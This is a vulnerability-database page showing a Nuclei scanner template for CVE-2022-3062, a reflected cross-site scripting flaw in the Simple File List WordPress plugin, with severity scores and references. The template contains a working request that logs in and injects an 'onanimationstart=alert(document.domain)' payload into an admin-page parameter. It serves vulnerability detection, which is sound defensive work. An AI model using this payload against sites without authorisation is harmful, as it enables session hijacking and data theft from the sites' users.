Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-3062
HistoryApr 21, 2023 - 8:56 a.m.

Simple File List < 4.4.12 - Cross Site Scripting

2023-04-2108:56:01
ProjectDiscovery
github.com
3
cve2022
cross-site scripting
wordpress
wp-plugin
wpscan
vulnerability
simple-file-list
authenticated
session hijacking
information theft

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

43.5%

The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
id: CVE-2022-3062

info:
  name: Simple File List < 4.4.12 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 4.4.12
  reference:
    - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3062
    - https://wordpress.org/plugins/simple-file-list/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3062
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43227
    cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: simplefilelist
    product: simple-file-list
    framework: wordpress
  tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "ee-simple-file-list")'
          - 'contains(body_2, "onanimationstart=alert(document.domain)//")'
        condition: and
# digest: 490a0046304402205105897f44d3816c47769c41fc4f3e93973ada3af56d974861f4e7935c3a85eb02203b4ec0b0e762749d37c743f15a512487d8019f7dc0a6b62066555b4449038171:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

43.5%